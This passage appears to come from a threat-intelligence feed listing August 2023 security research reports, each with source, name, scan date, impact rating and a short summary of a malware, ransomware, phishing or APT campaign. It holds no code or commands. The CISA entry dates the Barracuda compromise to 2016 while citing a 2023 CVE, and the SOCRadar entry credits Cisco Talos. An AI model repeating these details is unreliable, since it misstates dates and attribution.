- CERT-UA researchers have observed the distribution of emails with attachments in the form of BZIP, GZIP, and RAR archives containing BAT files created with the aid of the ScrubCrypt cryptor (price – from USD 249); launching them results in the computer being infected with the AsyncRAT malware.
—
- Intel Source:
- Juniper
- Intel Name:
- DreamBus_Botnet_comes_back
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Juniper Threat Labs researchers have observed multiple attacks where threat actors used a vulnerability affecting RocketMQ servers (CVE-2023-33246) to infiltrate systems and install the malicious DreamBus bot, a malware strain last seen in 2021. This vulnerability opened the door for hackers to exploit the RocketMQ platform, leading to a series of attacks. Juniper analysts shared the details of the attacks and the bot in their blog.
—
- Intel Source:
- Akamai
- Intel Name:
- IoT_Targeting_Malware_Expands_Threat_Landscape
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- The Akamai Security Intelligence Response Team (SIRT) has identified a concerning evolution in the KmsdBot malware campaign. The newly discovered Kmsdx binary marks a significant update, now focusing on targeting Internet of Things (IoT) devices. This version of the malware incorporates telnet scanning capabilities and supports a wider range of CPU architectures, expanding its attack potential. The update underscores the ongoing threat posed by vulnerable IoT devices and reinforces the critical need for continuous security measures and updates. KmsdBot’s scope encompasses private gaming servers, cloud hosting providers, and specific government and educational sites, suggesting a persistent concern for IoT security in a rapidly evolving threat landscape.
Source:
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
—
- Intel Source:
- DFIR Report
- Intel Name:
- Widespread_Ransomware_is_Caused_by_HTML_Smuggling
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers from the DFIR report have noted that the threat actor behind the Nokoyawa Ransomware only deployed the final ransomware 12 hours after the initial intrusion. In November 2022, this threat actor used HTML smuggling to send businesses a password-protected ZIP file. An ISO file that distributed IcedID, which then used Cobalt Strike and finally Nokoyawa ransomware, was contained in the password-protected ZIP file.
Source:
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
—
- Intel Source:
- Ironnet
- Intel Name:
- An_increase_in_MacOS_malware_detections
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- IronNet has observed an increase in MacOS malware within IronDome’s Education sector over the past couple of weeks. Their analysts’ investigation into these incidents found that these infections originated from already-infected personal devices that were brought into education networks, with the majority occurring at higher education institutions.
Source:
https://www.ironnet.com/blog/back-to-school-reminder-keep-your-macs-clean
—
- Intel Source:
- Netenrich
- Intel Name:
- In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers at Netenrich examined the Adhubllka ransomware, which is targeting regular people and small businesses with ransoms ranging from $800 to $1,600 since at least January 2020.
Source:
https://netenrich.com/blog/discovering-the-adhubllka-ransomware-family
—
- Intel Source:
- ASEC
- Intel Name:
- Case_Studies_of_MS_SQL_Server_Proxyjacking
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- Poorly managed MS-SQL servers have been the subject of proxyjacking attacks, according to ASEC experts. One of the primary attack methods for Windows systems is to employ publicly accessible MS-SQL servers with easy-to-guess passwords. Threat actors frequently attempt to obtain access to poorly maintained MS-SQL servers via brute force or dictionary assaults. If successful, they infect the system with malware.
—
- Intel Source:
- Trellix
- Intel Name:
- Recent_activity_of_Scattered_Spider_threat_group
- Date of Scan:
- 2023-08-26
- Impact:
- MEDIUM
- Summary:
- Trellix researchers describe in their blog the details of the modus operandi of Scattered Spider: their recent activity, the tools leveraged by them, the vulnerabilities exploited, and their impact. The blog also indicates that this group has started targeting other sectors, including critical infrastructure organizations. Scattered Spider is known for theft of sensitive data and for leveraging trusted organizational infrastructure for follow-on attacks on downstream customers.
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_new_threat_CollectionRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have discovered a new Lazarus Group threat called “CollectionRAT”. CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Cisco Talos analysts analyzed it and concluded that CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
Source:
https://blog.talosintelligence.com/lazarus-collectionrat/
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have identified the Lazarus Group as a state-sponsored actor operating against European and American healthcare organizations and internet backbone infrastructure. This is the third known effort that this actor is responsible for in less than a year, and they have all utilized the same infrastructure.
Source:
https://blog.talosintelligence.com/lazarus-quiterat/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Constant_Threat_Posed_by_Remcos_RAT
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have examined an ongoing operation run by the Remcos Remote Access Trojan (RAT). The analysis reveals a highly developed threat ecosystem that makes use of a number of strategies, including malicious IP addresses, covert payloads, and complex functions that infect systems and acquire sensitive data.
Source:
https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Microsoft has detected a pattern of malicious activity affecting organizations in Taiwan using techniques that could be easily reused in other operations anywhere else. Microsoft attributes this campaign to Flax Typhoon (overlaps with ETHEREAL PANDA), a nation-state actor based out of China. Flax Typhoon’s observed behavior indicates that the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- The_Investigation_of_RedLine_Stealer_Spam_Campaign
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have gathered samples from a RedLine stealer spam campaign that ran between April and August 2023. The campaign was successful because it distributed command and control among recently created domains hosted on IP addresses with reliable traffic, and because RedLine developers provide minor iterations on previous variants.
Source:
https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat
—
- Intel Source:
- Secureworks
- Intel Name:
- Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have seen the Smoke Loader botnet deliver a specific Wi-Fi scanning program to compromised systems. This trojan was given the name Whiffy Recon. With the help of adjacent Wi-Fi access points as a source of information, it triangulates the coordinates of the infected PCs using Google’s geolocation API.
—
- Intel Source:
- Any.Run
- Intel Name:
- Technical_Analysis_of_XWorm_Malware
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- AnyRun researchers have seen the latest version of an XWorm sample — a widespread malicious program that is advertised for sale on underground forums.
Source:
https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/
—
- Intel Source:
- Safebreach
- Intel Name:
- New_Threat_Coverage_Akira_8Base_and_Rorschach
- Date of Scan:
- 2023-08-24
- Impact:
- MEDIUM
- Summary:
- Safebreach researchers have observed that the Hacker’s Playbook Threat Coverage round-up unveils added coverage for recently identified ransomware and malware variants, including Akira ransomware, 8Base ransomware, Rorschach (BabLock) ransomware, and others. SafeBreach customers can now simulate and assess their defenses against these evolving threats using the SafeBreach Hacker’s Playbook™.
Source:
https://www.safebreach.com/resources/akira-ransomware-8base-threat-coverage/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Malvertising campaigns are evolving with the adoption of advanced cloaking techniques that hinder detection and response. This article explores a recent malvertising chain that employs intricate fingerprinting, using encoded JavaScript, to assess visitor legitimacy. This escalating cyber battle underscores the challenges faced by defenders in countering these deceptive tactics.
—
- Intel Source:
- Zscaler
- Intel Name:
- New_Info_Stealer_Family_Named_Agniane
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Agniane Stealer is a novel information stealer family discovered by Zscaler researchers. This malware takes credentials, system data, and session information from browsers, tokens, and file transfer tools. When Agniane Stealer acquires sensitive data, it passes it to command-and-control servers, where threat actors can act on the stolen information.
Source:
https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat
—
- Intel Source:
- SOC Radar
- Intel Name:
- Raccoon_Stealer_Returns_with_New_Version
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SOC Radar researchers have discovered that the creators of the data-stealing malware Raccoon Stealer have ended their six-month online silence. They are currently encouraging potential hackers to use the updated 2.3.0 malware (2.3.0.1 since August 15, 2023) version.
Source:
https://socradar.io/raccoon-stealer-resurfaces-with-new-enhancements/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that ransomware tactics have evolved, with attackers now targeting Linux and VMware ESXi platforms alongside Windows. This article explores recent ransomware families like MONTI Locker, Akira Ransomware, Trigona Linux Locker, and Abyss Locker. These threats exhibit cross-platform capabilities and strategic code reuse.
—
- Intel Source:
- Trendmicro
- Intel Name:
- AI_Hype_Abused_in_Malicious_Facebook_Ads
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- Trendmicro researchers have identified that cybercriminals are capitalizing on the excitement surrounding Artificial Intelligence (AI) advancements through deceptive Facebook ads. These ads promise AI-powered advantages but instead distribute a malicious browser add-on that aims to steal victims’ credentials. By exploiting AI enthusiasm, attackers are using URL shorteners and cloud storage to spread their harmful payload.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Dropping_AgentTesla_Exotic_Excel_Files
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- SANS researchers discovered that attackers prefer to employ more unusual file extensions to boost their chances of escaping simple mail gateway rules. This time, the extension “.xlam” was used. They discovered multiple emails that sent .xlam files to potential victims.
Source:
https://isc.sans.edu/diary/More+Exotic+Excel+Files+Dropping+AgentTesla/30150/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- ESET researchers examined the Spacecolon, a modest toolset used to distribute Scarab ransomware versions to victims all around the world. It is most likely introduced into victim organisations by its operators exploiting insecure web servers or brute-forcing RDP credentials.
Source:
https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/
—
- Intel Source:
- Cyfirma
- Intel Name:
- CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has identified a new Malware-as-a-Service (MaaS) operator known as EVLF DEV. This threat actor is responsible for the development of CypherRAT and CraxsRAT, which have been purchased on a lifetime licence by over 100 different threat actors in the previous three years.
Source:
https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Variant_of_XLoader_macOS_Malware
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that a new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called OfficeNote.
—
- Intel Source:
- ASEC
- Intel Name:
- APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations
- Date of Scan:
- 2023-08-22
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered APT attacks on Korean corporate web servers. The attackers exploit vulnerabilities to infiltrate and execute malicious actions. The report covers attack techniques such as privilege escalation, credential theft, and remote control using tools like Mimikatz, Potato, and NetCat. The attackers’ objectives appear to evolve from ad insertion to potentially deploying ransomware.
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that an emerging China-backed advanced persistent threat group targeted organizations in Hong Kong in a supply chain attack that leveraged legitimate software to deploy the PlugX/Korplug backdoor.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- System_BCMalware_Activity
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the captured request: /systembc/password.php. According to some references, this is likely the SystemBC Remote Access Trojan (RAT). All 4 IPs are part of the Digital Ocean ASN, and only one has been reported as likely malicious.
Source:
https://isc.sans.edu/diary/SystemBC+Malware+Activity/30138/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_WoofLocker_Tech_Support_Campaign_is_Back
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered that the WoofLocker tech support scam scheme has returned. The tactics and procedures are fairly similar, but the infrastructure has been strengthened to withstand future takedown attempts.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2
—
- Intel Source:
- Lumen
- Intel Name:
- HiatusRAT_Returns_To_Action_After_A_Short_Break
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Lumen researchers have continued to track the threat actor, resulting in new malware samples and infrastructure associated with the HiatusRAT cluster. In the latest campaign, they observed a shift in reconnaissance and targeting activity.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_a_Zalando_Phishing_to_a_RAT
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have seen a bunch of phishing emails targeting Zalando customers.
Source:
https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/
—
- Intel Source:
- QuickHeal
- Intel Name:
- Diving_Deep_into_Darkrace_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- The incorporation of Lockbit’s strategies into DarkRace demonstrates how cybercriminals are utilizing tried-and-true techniques to strengthen their attacks and increase damage. Combining these strategies could increase infections, compromise data, and escalate ransom demands.
Source:
https://blogs.quickheal.com/darkrace-ransomware-a-deep-dive-into-its-techniques-and-impact/
—
- Intel Source:
- eSentire
- Intel Name:
- StealC_Delivering_via_Deceptive_Google_Sheets
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Esentire have discovered that a malicious advertisement that the user saw while trying to download Google Sheets was the infection’s point of origin. This advertisement sent the visitor to a malicious website that contained a downloader for the malware StealC infostealer.
Source:
https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Tool_Deployed_by_Cuba_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have discovered and documented new tools used by the Cuba ransomware threat group. It is currently in the fourth year of its operation and shows no sign of slowing down. In the first half of 2023 alone, the operators behind Cuba ransomware were the perpetrators of several high-profile attacks across disparate industries.
—
- Intel Source:
- QuickHeal
- Intel Name:
- Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers from QuickHeal have discovered that the Mallox (also known as TargetCompany) ransomware is presently using unprotected Microsoft SQL Servers as an attack vector to enter victims’ systems and spread itself.
Source:
https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/
—
- Intel Source:
- Fortinet
- Intel Name:
- NoCry_and_Trash_Panda_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Researchers from Fortinet looked into Trash Panda and a fresh, tiny NoCry ransomware strain. Windows-based malware called Trash Panda was initially discovered in the first few days of August. On infected computers, it encrypts files, changes the desktop background, and drops a ransom note with political statements. The Windows platform ransomware known as NoCry was first identified in April 2021. The creators of the NoCry ransomware produce variations that are then offered for sale on the group’s Telegram channel.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-trash-panda-and-nocry-variant
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Gozi_Malware_Launches_Another_Attack
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- Researchers at IBM Security Intelligence have noticed that the Gozi malware has returned and is now focusing on cryptocurrency platforms, banks, and other financial institutions.
Source:
https://securityintelligence.com/posts/gozi-strikes-again-targeting-banks-cryptocurrency-and-more/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- A_new_phishing_campaign_targeting_Zimbra_users
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- ESET researchers have uncovered a mass-spreading phishing campaign, aimed at collecting Zimbra account users’ credentials, active since at least April 2023 and still ongoing. Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign is mass-spreading; its targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the greatest number of targets are located in Poland, followed by Ecuador and Italy. To date, we have not attributed this campaign to any known threat actors.
Source:
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/
—
- Intel Source:
- Sysdig
- Intel Name:
- Malicious_Campaign_Targeting_GitLab
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team has discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks.
Source:
https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
—
- Intel Source:
- Security Affairs
- Intel Name:
- Massive_phishing_campaign_targets_energy_sector
- Date of Scan:
- 2023-08-17
- Impact:
- MEDIUM
- Summary:
- Starting in May 2023, researchers from Cofense have observed a massive phishing campaign using QR codes in attacks to steal the Microsoft credentials of users from multiple industries. One of the organizations targeted by the attackers is a notable energy company in the US.
Source:
https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html?amp=1
—
- Intel Source:
- AT&T
- Intel Name:
- The_Shadow_Nexus_of_Malware_and_Proxy_Application
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Researchers from AT&T Alien Labs found a significant campaign of attacks distributing a proxy server application on Windows computers. Additionally, a proxy service provider was found, whose proxy requests are forwarded through hacked systems that have been turned into residential exit nodes by malware invasion.
—
- Intel Source:
- Trustwave
- Intel Name:
- The_rise_of_LLM_engines_WormGPT_and_FraudGPT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Trustwave researchers discussed in their blog two LLM engines that were up for sale on underground forums, WormGPT and FraudGPT. If criminals were to get their own ChatGPT-like tool, the implications for cybersecurity, social engineering, and overall digital safety could be very damaging. This prospect highlights the importance of staying vigilant in our efforts to secure, and responsibly develop, artificial intelligence technology in order to mitigate potential risks and safeguard against misuse.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wormgpt-and-fraudgpt-the-rise-of-malicious-llms/
https://netenrich.com/blog/fraudgpt-the-villain-avatar-of-chatgpt
—
- Intel Source:
- Cyberint
- Intel Name:
- Raccoon_Stealer_Malware_Returns
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyberint researchers have seen that the developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. It is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors.
Source:
https://cyberint.com/blog/financial-services/raccoon-stealer/
—
- Intel Source:
- Netskope
- Intel Name:
- Phishing_Campaign_Steals_Cloud_Credentials
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Over the last couple of months, Netskope Threat Labs analysts have been monitoring a staggering 61-fold increase in traffic to phishing pages hosted in Cloudflare R2. Most of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps. The attacks have been targeting victims mainly in North America and Asia, across different segments, led by the technology, financial services, and banking sectors.
—
- Intel Source:
- Cyble
- Intel Name:
- Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyble researchers have recently come across a novel approach for spreading SectopRAT. This technique entails delivering the SectopRAT payload by utilizing the Amadey bot malware, which is retrieved from the LummaC stealer.
Source:
https://cyble.com/blog/lummac-stealer-leveraging-amadey-bot-to-deploy-sectoprat/
—
- Intel Source:
- Uptycs
- Intel Name:
- QwixxRAT_aka_Telegram_RAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- The Uptycs researchers discovered QwixxRAT (aka Telegram RAT) in early August 2023. The threat actor is widely distributing their malicious tool through Telegram and Discord platforms. Once installed on the victim’s Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker’s Telegram bot, providing them with unauthorized access to the victim’s sensitive information.
Source:
https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram
—
- Intel Source:
- ASEC
- Intel Name:
- Hakuna_Matata_ransomware
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Recently, ASEC researchers have discovered that the Hakuna Matata ransomware is being used to attack Korean companies. Hakuna Matata is a recent ransomware; it was first identified in July 2023 on Twitter. Later that month, a post by a threat actor using Hakuna Matata on the dark web was shared on Twitter as well. The researchers also note that, among the ransomware strains uploaded to VirusTotal, the file uploaded on July 2nd, 2023 is confirmed to be the first case.
—
- Intel Source:
- Trellix
- Intel Name:
- NetSupportRAT_exploring_new_techniques
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Trellix researchers observed a new campaign using fake Chrome browser updates to trick victims into installing a remote administration software tool called NetSupport Manager. The threat actors take advantage of this software to steal information and take control of victim computers. The detected campaign is similar to the previously reported SocGholish campaign, which was run by a suspected Russian threat actor.
—
- Intel Source:
- Fortinet
- Intel Name:
- Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Python Package Index (PyPI) packages have become a common place for threat actors to post malware that unsuspecting victims might download. FortiGuard Labs analysts have been monitoring this attack vector for some time and posted an update on the zero-day attacks they have discovered. Recently, they discovered several new zero-day PyPI attacks using an AI engine assistant.
Source:
https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi
—
- Intel Source:
- HP ThreatResearch
- Intel Name:
- The_malware_campaigns_use_a_variety_of_programming_languages
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Over the last couple of months, the HP Threat Research team has noticed a surge of finance-themed malicious spam campaigns spreading malware through batch scripts (.bat). The campaigns use a wide variety of programming languages to achieve different objectives within the infection chain – from batch scripts, PowerShell, Go, and shellcode to .NET.
Source:
https://threatresearch.ext.hp.com/do-you-speak-multiple-languages-malware-does/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Stealthy_Malicious_MSI_Loader
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Cyfirma researchers have observed a disguised Stealthy MSI Loader being advertised in dark web forums by a Russian threat actor, showcasing its potential ability to evade detection by both VirusTotal scans and Windows Defender. Additionally, through the researchers’ investigation, a link was established between this MSI Loader and the BatLoader campaign observed in March 2023, highlighting potential coordination between these threats.
—
- Intel Source:
- Akamai
- Intel Name:
- New_Magento_Campaign_Discovered_called_Xurum
- Date of Scan:
- 2023-08-14
- Impact:
- LOW
- Summary:
- Over the past few months, Akamai has been closely monitoring a focused campaign that specifically targets a relatively small number of Magento deployments. They dubbed the campaign Xurum to reference the domain name of the C2 server utilized by the attacker.
Source:
https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell
—
- Intel Source:
- CISA
- Intel Name:
- Updates_on_SEASPY_and_WHIRLPOOL_Backdoors
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- The US Department of Homeland Security (CISA) has published a report on Barracuda email servers that were compromised by cyber-thieves in the summer of 2016 and the following year. CISA obtained four malware samples – including SEASPY and WHIRLPOOL backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-221a
—
- Intel Source:
- CERT UA
- Intel Name:
- Phishing_Attack_Targeting_Government_Agencies
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has identified a phishing attack on government agencies involving fraudulent emails from CERT-UA urging password change through a malicious link. The attackers imitate Roundcube’s interface and use a deceptive subdomain
—
- Intel Source:
- Zscaler
- Intel Name:
- Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- JanelaRAT, a newly discovered cyber threat, has been unveiled by Zscaler ThreatLabz. Primarily focused on the Latin American (LATAM) financial sector, this sophisticated malware employs advanced techniques including DLL side-loading and dynamic command and control infrastructure. With capabilities ranging from evasive maneuvers to self-defense mechanisms, the threat aims to compromise sensitive financial data. The malware’s origins are suggested by Portuguese strings in its code and a Portuguese-speaking developer, highlighting its targeted region and intentions.
—
- Intel Source:
- Trendmicro
- Intel Name:
- Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observed that the Monti ransomware group, which resembles Conti, has resumed attacks on the legal and government sectors with a fresh Linux variant. Unlike previous versions, this variant modifies encryption methods, uses an infection marker, and alters system files.
—
- Intel Source:
- SOCRadar
- Intel Name:
- A_new_cybercriminals_service_called_Dark_Utilities
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- In their blog, Cisco Talos shared that they observed malware samples using the Dark Utilities service in the wild to establish C2 communication channels and remote access capabilities on infected systems. They discovered malware targeting Windows and Linux systems that leveraged Dark Utilities.
Source:
https://socradar.io/dark-utilities-platform-provides-c2-server-for-threat-actors/
—
- Intel Source:
- Sucuri
- Intel Name:
- The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery
- Date of Scan:
- 2023-08-12
- Impact:
- LOW
- Summary:
- This month, Sucuri analysts traced a noticeable surge in malware cases linked to a malicious payload delivery system known as Gootloader. The group behind this malware is believed to operate a malware-as-a-service operation, exclusively providing a malware delivery service for other threat actors. In their blog, Sucuri discusses why Gootloader is so effective, goes into the details of its inner workings, and sheds light on the tactics employed by the operators behind it.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_SugarCRM_CVE_2023_22952_zero_day_vulnerability
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- A zero-day vulnerability in the SugarCRM customer relationship management platform was used by threat actors to gain access to customers’ AWS accounts, according to a report from Palo Alto Networks Unit 42.
Source:
https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Campaign_Against_NATO_Aligned_Foreign_Ministries
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- Two PDF documents have been spotted, and EclecticIQ researchers believe with high confidence that they are a part of a continuous campaign aimed at NATO member countries’ foreign ministries. The PDF files contained two fake diplomatic invitations that appeared to be coming from the German embassy.
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- MoustachedBouncer_cyberespionage_activity_against_diplomats
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- MoustachedBouncer is a cyberespionage group discovered by ESET Research that has been active since 2014. WeLiveSecurity researchers believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its AitM operations.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Common_TTPs_of_attacks_against_industrial_organizations
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Kaspersky ICS Cert analysts identified over 15 implants and their variants planted by the threat actor(s) in various combinations. The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems. Analysts have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in their report.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- The Cyble Research and Intelligence Labs have discovered a fresh method of infection that is used to spread STRRAT. This novel approach entails disseminating STRRAT version 1.6, which makes use of two string obfuscation strategies.
Source:
https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard have discovered a brand-new Rust-written injector that can introduce XWorm and shellcode into a victim’s environment. Additionally, an investigation by researchers showed a sharp rise in injector activity in May 2023. To avoid antivirus detection, shellcode can be encrypted using AES, RC4, or LZMA, and it can be Base64-encoded.
Source:
https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter
—
- Intel Source:
- Sucuri
- Intel Name:
- Hybrid_malware_leveraging_various_internet_protocols
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Sucuri analysts periodically discover unique hybrid malware leveraging various internet protocols. During a recent investigation, the analysts found an interesting piece of JavaScript malware that indirectly uses the DNS protocol to obtain redirect URLs.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Zero_Day_Exploit_Case_Study_CVE_2023_36874
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- In July 2023, the CrowdStrike Falcon team observed an exploit for a previously unknown vulnerability affecting the Windows Error Reporting (WER) component. The CrowdStrike team reported their findings on this new vulnerability to Microsoft, which assigned it the identifier CVE-2023-36874.
Source:
